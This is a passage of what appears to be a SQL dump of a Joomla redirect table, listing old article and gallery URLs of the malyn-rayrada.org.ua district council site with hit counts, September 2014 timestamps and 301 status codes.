00:00:00',301),(3384,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-l-r-2012-2015-&catid=51&Itemid=92&lang=ru','','','',3,0,'2014-09-20 20:32:55','0000-00-00 00:00:00',301),(3385,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&lang=uk&Itemid=','','','',5,0,'2014-09-20 20:33:19','0000-00-00 00:00:00',301),(3386,'http://www.malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=2&Itemid=1&lang=ru','','','',9,0,'2014-09-20 20:33:48','0000-00-00 00:00:00',301),(3387,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11&Itemid=14&lang=en','','','',4,0,'2014-09-20 20:35:17','0000-00-00 00:00:00',301),(3388,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1031:2013-06-17-06-49-26&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-09-20 20:35:40','0000-00-00 00:00:00',301),(3389,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1111:2013-10-22-16-06-36&catid=11&lang=ru','','','',3,0,'2014-09-20 20:35:42','0000-00-00 00:00:00',301),(3390,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1240:2014-03-17-07-01-32&catid=57&Itemid=98&lang=ru','','','',5,0,'2014-09-20 20:37:35','0000-00-00 00:00:00',301),(3391,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=928:2013-02-21-09-10-17&catid=47:--21022013-&Itemid=86&lang=uk','','','',4,0,'2014-09-20 20:38:55','0000-00-00 00:00:00',301),(3392,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=985:2013-04-12-09-53-08&catid=49:--12042013-&Itemid=88&lang=ru','','','',3,0,'2014-09-20 20:40:15','0000-00-00 00:00:00',301),(3393,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1116:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-20 20:43:03','0000-00-00 00:00:00',301),(3394,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=878:2012-12-21-16-59-28&catid=46&Itemid=85&lang=uk','','','',1,0,'2014-09-20 20:43:13','0000-00-00 00:00:00',301),(3395,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1097:2013-09-25-08-35-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-20 20:44:39','0000-00-00 00:00:00',301),(3396,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-09-20 20:48:43','0000-00-00 00:00:00',301),(3397,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1123:-2013-&catid=53:--25102013-&Itemid=94&lang=uk','','','',17,0,'2014-09-20 20:50:12','0000-00-00 00:00:00',301),(3398,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=928:2013-02-21-09-10-17&catid=47:--21022013-&Itemid=86&lang=ru','','','',9,0,'2014-09-20 20:50:15','0000-00-00 00:00:00',301),(3399,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=853:2012-12-11-13-39-46&catid=32:2011-03-31-12-03-04&Itemid=64&lang=ru','','','',3,0,'2014-09-20 20:52:38','0000-00-00 00:00:00',301),(3400,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1021:---l---r&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-09-20 20:52:42','0000-00-00 00:00:00',301),(3401,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1017:-2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-20 20:52:44','0000-00-00 00:00:00',301),(3402,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=943:-qq&catid=11&lang=ru&Itemid=0','','','',1,0,'2014-09-20 20:54:29','0000-00-00 00:00:00',301),(3403,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-20 20:55:57','0000-00-00 00:00:00',301),(3404,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-09-20 20:56:37','0000-00-00 00:00:00',301),(3405,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1207:-2007-2015-&catid=56:--03022014-&Itemid=97&lang=ru','','','',3,0,'2014-09-20 21:01:35','0000-00-00 00:00:00',301),(3406,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1290:2014-04-23-06-56-41&catid=10&Itemid=17&lang=ru','','','',7,0,'2014-09-20 21:04:05','0000-00-00 00:00:00',301),(3407,'http://malyn-rayrada.org.ua/undefined','','','',2,0,'2014-09-20 21:05:09','0000-00-00 00:00:00',301),(3408,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1058:-2013-&catid=51&Itemid=92&lang=uk','','','',2,0,'2014-09-20 21:08:20','0000-00-00 00:00:00',301),(3409,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1303:2014-04-29-13-13-18&catid=10&Itemid=17&lang=uk','','','',4,0,'2014-09-20 21:09:05','0000-00-00 00:00:00',301),(3410,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=985:2013-04-12-09-53-08&catid=49:--12042013-&Itemid=88&lang=uk','','','',3,0,'2014-09-20 21:09:41','0000-00-00 00:00:00',301),(3411,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1143:2013-11-26-13-23-37&catid=54:--29112013-&Itemid=95&lang=ru','','','',3,0,'2014-09-20 21:10:19','0000-00-00 00:00:00',301),(3412,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1141:2013-11-26-13-18-12&catid=54:--29112013-&Itemid=95&lang=ru','','','',3,0,'2014-09-20 21:11:19','0000-00-00 00:00:00',301),(3413,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=948:-2012-&catid=49&Itemid=88&lang=en','','','',8,0,'2014-09-20 21:11:30','0000-00-00 00:00:00',301),(3414,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:----3110&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-09-20 21:11:31','0000-00-00 00:00:00',301),(3415,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=960:-19-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-20 21:14:00','0000-00-00 00:00:00',301),(3416,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:--------15--2010---12-l----r&catid=36&Itemid=70&lang=ru','','','',5,0,'2014-09-20 21:16:26','0000-00-00 00:00:00',301),(3417,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=853:2012-12-11-13-39-46&catid=32&Itemid=64&lang=ru','','','',2,0,'2014-09-20 21:18:49','0000-00-00 00:00:00',301),(3418,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:-l-r&catid=57:--15042014-&Itemid=98&lang=uk','','','',3,0,'2014-09-20 21:20:02','0000-00-00 00:00:00',301),(3419,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1192:-------------------2014-2015--&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',6,0,'2014-09-20 21:21:28','0000-00-00 00:00:00',301),(3420,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1120:2013-10-25-12-32-17&catid=53&Itemid=94&lang=uk','','','',1,0,'2014-09-20 21:23:00','0000-00-00 00:00:00',301),(3421,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1054:2013-07-19-11-38-20&catid=51&Itemid=92&lang=uk','','','',1,0,'2014-09-20 21:23:10','0000-00-00 00:00:00',301),(3422,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1088:2013-09-19-12-06-07&catid=53:--25102013-&Itemid=94&lang=uk','','','',6,0,'2014-09-20 21:23:13','0000-00-00 00:00:00',301),(3423,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1120:2013-10-25-12-32-17&catid=53:--25102013-&Itemid=94&lang=ru','','','',10,0,'2014-09-20 21:30:03','0000-00-00 00:00:00',301),(3424,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&Itemid=14&lang=ru','','','',15,0,'2014-09-20 21:33:50','0000-00-00 00:00:00',301),(3425,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&catid=36&Itemid=70&lang=en','','','',6,0,'2014-09-20 21:36:42','0000-00-00 00:00:00',301),(3426,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1198:2014-01-31-07-37-58&catid=56:--03022014-&Itemid=97&lang=uk','','','',3,0,'2014-09-20 21:39:09','0000-00-00 00:00:00',301),(3427,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=928:2013-02-21-09-10-17&catid=47:-21022013-&Itemid=86&lang=ru','','','',2,0,'2014-09-20 21:42:18','0000-00-00 00:00:00',301),(3428,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1141:2013-11-26-13-18-12&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',4,0,'2014-09-20 21:43:13','0000-00-00 00:00:00',301),(3429,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-20 21:43:18','0000-00-00 00:00:00',301),(3430,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1141:2013-11-26-13-18-12&catid=54&Itemid=95&lang=ru','','','',1,0,'2014-09-20 21:43:24','0000-00-00 00:00:00',301),(3431,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=885:-2013-2015-&catid=46:--21122012&Itemid=85&lang=en','','','',2,0,'2014-09-20 21:44:17','0000-00-00 00:00:00',301),(3432,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1099:------------------l-r&catid=36&Itemid=70&lang=uk','','','',7,0,'2014-09-20 21:46:55','0000-00-00 00:00:00',301),(3433,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=928:2013-02-21-09-10-17&catid=47:-21022013-&Itemid=86&lang=uk','','','',3,0,'2014-09-20 21:46:58','0000-00-00 00:00:00',301),(3434,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:----3110&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',2,0,'2014-09-20 21:47:49','0000-00-00 00:00:00',301),(3435,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1216:-q-q&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',9,0,'2014-09-20 21:49:10','0000-00-00 00:00:00',301),(3436,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=885:-2013-2015-&catid=46&Itemid=85&lang=en','','','',3,0,'2014-09-20 21:51:41','0000-00-00 00:00:00',301),(3437,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1120:2013-10-25-12-32-17&catid=53&Itemid=94&lang=uk','','','',5,0,'2014-09-20 21:52:33','0000-00-00 00:00:00',301),(3438,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1371:2014-08-04-19-11-42&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-20 21:58:26','0000-00-00 00:00:00',301),(3439,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1120:2013-10-25-12-32-17&catid=53&Itemid=94&lang=ru','','','',3,0,'2014-09-20 22:00:19','0000-00-00 00:00:00',301),(3440,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1054:2013-07-19-11-38-20&catid=51&Itemid=92&lang=ru','','','',5,0,'2014-09-20 22:01:53','0000-00-00 00:00:00',301),(3441,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&catid=49&Itemid=88&lang=en','','','',1,0,'2014-09-20 22:06:27','0000-00-00 00:00:00',301),(3442,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1290:2014-04-23-06-56-41&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',3,0,'2014-09-20 22:07:48','0000-00-00 00:00:00',301),(3443,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1120:2013-10-25-12-32-17&catid=53:--25102013-&Itemid=94&lang=ru','','','',3,0,'2014-09-20 22:08:24','0000-00-00 00:00:00',301),(3444,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1290:2014-04-23-06-56-41&catid=10:2010-06-05-13-46-44&Itemid=17&lang=uk','','','',2,0,'2014-09-20 22:14:35','0000-00-00 00:00:00',301),(3445,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1143:2013-11-26-13-23-37&catid=54:--29112013-&Itemid=95&lang=uk','','','',2,0,'2014-09-20 22:15:48','0000-00-00 00:00:00',301),(3446,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:----3110&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',3,0,'2014-09-20 22:16:28','0000-00-00 00:00:00',301),(3447,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&Itemid=14&lang=ru','','','',3,0,'2014-09-20 22:19:24','0000-00-00 00:00:00',301),(3448,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1120:2013-10-25-12-32-17&catid=53:--25102013-&Itemid=94&lang=uk','','','',4,0,'2014-09-20 22:20:43','0000-00-00 00:00:00',301),(3449,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&catid=49:--12042013-&Itemid=88&lang=en','','','',2,0,'2014-09-20 22:21:53','0000-00-00 00:00:00',301),(3450,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1143:2013-11-26-13-23-37&catid=54&Itemid=95&lang=ru','','','',3,0,'2014-09-20 22:29:21','0000-00-00 00:00:00',301),(3451,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',8,0,'2014-09-20 22:30:28','0000-00-00 00:00:00',301),(3452,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1368:2014-07-17-04-39-11&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-09-20 22:37:02','0000-00-00 00:00:00',301),(3453,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',9,0,'2014-09-20 22:37:36','0000-00-00 00:00:00',301),(3454,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1054:2013-07-19-11-38-20&catid=51:--19072013-&Itemid=92&lang=ru','','','',4,0,'2014-09-20 22:37:55','0000-00-00 00:00:00',301),(3455,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',14,0,'2014-09-20 22:40:18','0000-00-00 00:00:00',301),(3456,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1349:-31-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-20 22:40:21','0000-00-00 00:00:00',301),(3457,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-----lr--2012-2015-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',5,0,'2014-09-20 22:40:24','0000-00-00 00:00:00',301),(3458,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&catid=36&Itemid=70&lang=en','','','',4,0,'2014-09-20 22:40:26','0000-00-00 00:00:00',301),(3459,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=944:-l-r-&catid=36&Itemid=70&lang=uk','','','',3,0,'2014-09-20 22:41:10','0000-00-00 00:00:00',301),(3460,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1312:2014-05-08-08-59-19&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',6,0,'2014-09-20 22:45:29','0000-00-00 00:00:00',301),(3461,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',10,0,'2014-09-20 22:45:37','0000-00-00 00:00:00',301),(3462,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1112:2013-10-23-09-24-43&catid=53:--25102013-&Itemid=94&lang=uk','','','',5,0,'2014-09-20 22:46:06','0000-00-00 00:00:00',301),(3463,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1294:-2012-2015-&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-09-20 22:46:36','0000-00-00 00:00:00',301),(3464,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=937:---------------------------21122012--l--&catid=47:--21022013-&Itemid=86&lang=en','','','',1,0,'2014-09-20 22:47:12','0000-00-00 00:00:00',301),(3465,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1204:2014-01-31-07-51-23&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',10,0,'2014-09-20 22:47:35','0000-00-00 00:00:00',301),(3466,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1039:---------------l-r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',10,0,'2014-09-20 22:47:59','0000-00-00 00:00:00',301),(3467,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1012:l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-20 22:50:59','0000-00-00 00:00:00',301),(3468,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1043:-2013-&catid=51:--19072013-&Itemid=92&lang=en','','','',5,0,'2014-09-20 22:51:33','0000-00-00 00:00:00',301),(3469,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1279:2014-04-13-11-36-46&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-20 22:56:35','0000-00-00 00:00:00',301),(3470,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11&lang=en','','','',2,0,'2014-09-20 22:57:25','0000-00-00 00:00:00',301),(3471,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&catid=51:--19072013-&Itemid=92&lang=uk','','','',2,0,'2014-09-20 23:01:56','0000-00-00 00:00:00',301),(3472,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-20 23:05:24','0000-00-00 00:00:00',301),(3473,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1368:2014-07-17-04-39-11&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-09-20 23:06:36','0000-00-00 00:00:00',301),(3474,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1039:-l-r&catid=51:--19072013-&Itemid=92&lang=uk','','','',2,0,'2014-09-20 23:13:21','0000-00-00 00:00:00',301),(3475,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1294:-2012-2015-&catid=36&Itemid=70&lang=uk','','','',5,0,'2014-09-20 23:16:20','0000-00-00 00:00:00',301),(3476,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1112:2013-10-23-09-24-43&catid=53:--25102013-&Itemid=94&lang=ru','','','',5,0,'2014-09-20 23:16:29','0000-00-00 00:00:00',301),(3477,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-20 23:17:12','0000-00-00 00:00:00',301),(3478,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&catid=51:--19072013-&Itemid=92&lang=ru','','','',3,0,'2014-09-20 23:17:23','0000-00-00 00:00:00',301),(3479,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1120:2013-10-25-12-32-17&catid=53&Itemid=94&lang=ru','','','',4,0,'2014-09-20 23:19:12','0000-00-00 00:00:00',301),(3480,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1043:-------2013-&catid=36&Itemid=70&lang=en','','','',3,0,'2014-09-20 23:20:07','0000-00-00 00:00:00',301),(3481,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-20 23:20:39','0000-00-00 00:00:00',301),(3482,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1029:2013-06-17-06-34-51&catid=51:--19072013-&Itemid=92&lang=ru','','','',4,0,'2014-09-20 23:23:20','0000-00-00 00:00:00',301),(3483,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1285:2014-04-17-16-55-05&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-20 23:25:23','0000-00-00 00:00:00',301),(3484,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',5,0,'2014-09-20 23:31:38','0000-00-00 00:00:00',301),(3485,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1091:2013-09-19-12-13-07&catid=53:--25102013-&Itemid=94&lang=ru','','','',4,0,'2014-09-20 23:37:13','0000-00-00 00:00:00',301),(3486,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-20 23:40:26','0000-00-00 00:00:00',301),(3487,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11&lang=en&Itemid=0','','','',1,0,'2014-09-20 23:42:06','0000-00-00 00:00:00',301),(3488,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1039:-l-r&catid=51:--19072013-&Itemid=92&lang=ru','','','',2,0,'2014-09-20 23:42:08','0000-00-00 00:00:00',301),(3489,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1288:2014-04-23-06-50-40&catid=10:2010-06-05-13-46-44&Itemid=17&lang=en','','','',1,0,'2014-09-20 23:42:33','0000-00-00 00:00:00',301),(3490,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1078:-2007-2015-&catid=53:--25102013-&Itemid=94&lang=ru','','','',1,0,'2014-09-20 23:42:43','0000-00-00 00:00:00',301),(3491,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=937:---------------------------21122012--l--&catid=47&Itemid=86&lang=uk','','','',1,0,'2014-09-20 23:45:38','0000-00-00 00:00:00',301),(3492,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1151:2013-11-28-14-54-33&catid=54:--29112013-&Itemid=95&lang=ru','','','',3,0,'2014-09-20 23:48:13','0000-00-00 00:00:00',301),(3493,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=4&Itemid=8&lang=en','','','',7,0,'2014-09-20 23:48:23','0000-00-00 00:00:00',301),(3494,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1163:2013-12-20-07-44-35&catid=15:2010-06-06-09-34-01&Itemid=18&lang=en','','','',6,0,'2014-09-20 23:48:31','0000-00-00 00:00:00',301),(3495,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1023:-l-28r-&catid=51&Itemid=92&lang=en','','','',4,0,'2014-09-20 23:48:43','0000-00-00 00:00:00',301),(3496,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1278:2014-04-11-13-44-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',4,0,'2014-09-20 23:48:59','0000-00-00 00:00:00',301),(3497,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-20 23:49:04','0000-00-00 00:00:00',301),(3498,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1318:----3110&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',9,0,'2014-09-20 23:51:22','0000-00-00 00:00:00',301),(3499,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1018:2013-06-06-11-22-34&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-20 23:55:20','0000-00-00 00:00:00',301),(3500,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1273:2014-04-10-06-15-24&catid=57:--15042014-&Itemid=98&lang=en','','','',42,0,'2014-09-20 23:55:43','0000-00-00 00:00:00',301),(3501,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1199:-l-r-&catid=56:--03022014-&Itemid=97&lang=uk','','','',5,0,'2014-09-20 23:55:56','0000-00-00 00:00:00',301),(3502,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=895:---------2013-2017-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',1,0,'2014-09-20 23:56:28','0000-00-00 00:00:00',301),(3503,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=925:-l-r-&catid=47:-21022013-&Itemid=86&lang=en','','','',2,0,'2014-09-20 23:58:48','0000-00-00 00:00:00',301),(3504,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=4&layout=blog&Itemid=8&lang=en','','','',2,0,'2014-09-20 23:59:13','0000-00-00 00:00:00',301),(3505,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11&Itemid=14&lang=ru','','','',2,0,'2014-09-20 23:59:38','0000-00-00 00:00:00',301),(3506,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1199:---------------l-r---&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',5,0,'2014-09-20 23:59:58','0000-00-00 00:00:00',301),(3507,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-21 00:01:06','0000-00-00 00:00:00',301),(3508,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=937:---------------------------21122012--l--&catid=47&Itemid=86&lang=uk','','','',8,0,'2014-09-21 00:01:20','0000-00-00 00:00:00',301),(3509,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1326:-100-547&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-21 00:03:21','0000-00-00 00:00:00',301),(3510,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=category&id=4:2010-06-05-12-51-18&layout=blog&Itemid=8&lang=en','','','',6,0,'2014-09-21 00:04:44','0000-00-00 00:00:00',301),(3511,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1107:c-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-21 00:13:27','0000-00-00 00:00:00',301),(3512,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-l-r-2012-2015-&catid=51:--19072013-&Itemid=92&lang=uk','','','',3,0,'2014-09-21 00:14:59','0000-00-00 00:00:00',301),(3513,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1069:23--------&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-21 00:16:44','0000-00-00 00:00:00',301),(3514,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',9,0,'2014-09-21 00:28:18','0000-00-00 00:00:00',301),(3515,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',3,0,'2014-09-21 00:28:59','0000-00-00 00:00:00',301),(3516,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1065:2013-08-14-12-52-50&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-21 00:31:25','0000-00-00 00:00:00',301),(3517,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=925:-l-r-&catid=47:--21022013-&Itemid=86&lang=en','','','',3,0,'2014-09-21 00:32:09','0000-00-00 00:00:00',301),(3518,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1112:2013-10-23-09-24-43&catid=53:--25102013-&Itemid=94&lang=ru','','','',2,0,'2014-09-21 00:32:48','0000-00-00 00:00:00',301),(3519,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1151:2013-11-28-14-54-33&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',5,0,'2014-09-21 00:33:21','0000-00-00 00:00:00',301),(3520,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=925:-l-r-&catid=47&Itemid=86&lang=en','','','',2,0,'2014-09-21 